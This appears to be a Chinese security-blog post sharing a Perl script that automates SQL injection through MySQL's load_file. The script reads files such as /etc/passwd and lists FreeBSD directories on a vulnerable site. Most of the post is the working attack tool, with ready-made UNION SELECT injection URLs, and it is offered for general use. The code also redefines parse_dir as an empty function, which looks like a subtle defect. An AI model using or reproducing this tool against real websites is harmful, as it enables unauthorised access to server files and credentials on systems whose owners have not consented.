SQL注射中使用Mysql load_file解析bsd目录的脚本
- 发表于
- Vulndb
作者:xi4oyu
可能不少x客都知道mysql load_file能够读取文件的内容。但是在bsd平台上,load_file也能够以文件的方式读取目录内容的前512个字节。
以前遇到这种站都是泛着恶心的手工load,然后在一堆可打印字符中查找目录名称。
后来实在抗不住了,得,我还是写个“友爱”的程序来自动解析吧,这样也避免了某些情况下目录被看漏掉。
今天偶尔从硬盘里面翻到的,放出来大家用用吧,有问题反馈下。Thx
xi4oyu@3xpl4b:~$ perl dump_bsd_dir.pl
dump_bsd_dir : List freebsd DIRS USE load_file with MYSQL
By xi4oyu evil.xi4oyu#gmail.com
http://www.pentestday.com
usage: dump_bsd_dir.pl [options]
-u : Inject url
-d|-f : DIR/FILE to list
Ext: dump_bsd_dir.pl -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,FUCKBSD,3 -d /etc
dump_bsd_dir.pl -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,FUCKBSD,3 -f /etc/passwd
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 |
#!/usr/bin/perl use LWP::UserAgent; use strict; use Getopt::Std; use vars qw / %opt /; use constant True => 1; my $rep_word = "FUCKBSD"; my $sep_flag = "%!!"; my $user_agent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;.NET CLR 1.1.4122)"; my $target = ''; my $target_rep = ''; my $dir = ''; my $file = ''; sub usage{ print STDERR <<"EOF"; dump_bsd_dir : List freebsd DIRS USE load_file with MYSQL By xi4oyu evil.xi4oyu#gmail.com http://www.pentestday.com usage: $0 [options] -u : Inject url -d|-f : DIR/FILE to list Ext: $0 -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,FUCKBSD,3 -d /etc $0 -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,FUCKBSD,3 -f /etc/passwd EOF exit; } sub hex_str{ my $hex_str = shift; my $hexed_str = "0x"; $hexed_str .= unpack("H*",$hex_str); return $hexed_str; } #This function parsed freebsd dirent struct and print out result =pod src/sys/sys/dirent.h Ref:http://fxr.watson.org/fxr/source/sys/dirent.h?v=FREEBSD7 49 50 struct dirent { 51 __uint32_t d_fileno; /* file number of entry */ 52 __uint16_t d_reclen; /* length of this record */ 53 __uint8_t d_type; /* file type, see below */ 54 __uint8_t d_namlen; /* length of string in d_name */ 55 #if __BSD_VISIBLE 56 #define MAXNAMLEN 255 57 char d_name[MAXNAMLEN + 1]; /* name must be no longer than this */ 58 #else 59 char d_name[255 + 1]; /* name must be no longer than this */ 60 #endif 61 }; 62 63 #if __BSD_VISIBLE 64 /* 65 * File types 66 */ 67 #define DT_UNKNOWN 0 68 #define DT_FIFO 1 69 #define DT_CHR 2 70 #define DT_DIR 4 71 #define DT_BLK 6 72 #define DT_REG 8 73 #define DT_LNK 10 74 #define DT_SOCK 12 75 #define DT_WHT 14 =cut sub parse_dir{ my $dirent_hex = shift; #skip 48 my $dir = substr($dirent_hex,48); my $ent_len = 9; my $index = 0; while( True ){ my $header = substr($dir,$index,16); my ($inode,$ent_len,$ent_type,$name_len) = unpack("LSCC",pack("H*",$header)); last if $ent_len == 0; my $name = substr($dir,$index+16,$name_len * 2); my $str_name = unpack("a*",pack("H*",$name)); my $type = "file:"; if($ent_type == 4){ $type = "dir:"; $str_name .= "/"; }elsif($ent_type == 10){ $type = "link:"; }elsif($ent_type == 1){ $type = "fifo:"; }elsif($ent_type == 12){ $type = "socket:"; }elsif($ent_type == 6){ $type = "blk:"; } print "$type\t$str_name\n"; $index += 2* $ent_len; } } sub get_that_shit{ my $hexed_str = shift; my $url = $target; $url =~ s/$rep_word/$hexed_str/g; #print $url; my $ua = LWP::UserAgent->new; $ua->agent("$user_agent"); my $req = HTTP::Request->new(GET => "$url"); my $rest = $ua->request($req); my $content = $rest->content; #print $content; my $ret = "ERROR"; #print $sep_flag; if( $content =~ /$sep_flag(.*)$sep_flag/sg){ $ret = $1; } return $ret; } sub parse_dir{ my $hex_code = shift; } #================================================================# #Here We Go! my $opt_string = "u:d:f:"; usage if $#ARGV < 0; getopts("$opt_string",\%opt) or usage(); usage if $opt{h}; $target = $opt{u} if $opt{u}; $dir = $opt{d} if $opt{d}; $file = $opt{f} if $opt{f}; if(!$target || (!$dir && !$file)){ usage(); } my $hexed_str = ""; my $sep_flag_hex = hex_str($sep_flag); if($dir){ $hexed_str = "hex(concat($sep_flag_hex,load_file(".hex_str($dir)."),$sep_flag_hex))"; }else{ $hexed_str = "concat($sep_flag_hex,load_file(".hex_str($file)."),$sep_flag_hex)"; } #print $hexed_str."\n"; my $ret_str = get_that_shit($hexed_str); if($file){ print $ret_str; }else{ parse_dir($ret_str); } |
原文连接:SQL注射中使用Mysql load_file解析bsd目录的脚本
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
